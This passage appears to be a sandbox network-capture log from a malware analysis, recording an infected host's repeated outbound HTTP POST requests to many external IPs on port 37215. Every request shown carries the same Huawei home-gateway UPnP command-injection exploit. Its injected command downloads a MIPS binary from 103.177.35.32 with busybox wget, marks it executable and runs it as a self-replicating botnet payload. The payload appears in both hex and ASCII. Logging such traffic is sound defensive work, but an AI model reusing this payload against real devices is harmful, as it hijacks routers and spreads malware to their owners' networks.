                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.2335798169.43.97.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.295831919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.235734241.48.166.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.295831919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.234137441.148.56.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.295963049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.236039041.4.165.17537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.295996904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.235516441.203.106.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.295998096 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.234128241.45.139.16737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296003103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.2332942113.60.169.3837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296025991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.235791641.222.85.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296149969 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.2344960157.183.231.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296179056 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.2351646157.66.81.23937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.296251059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
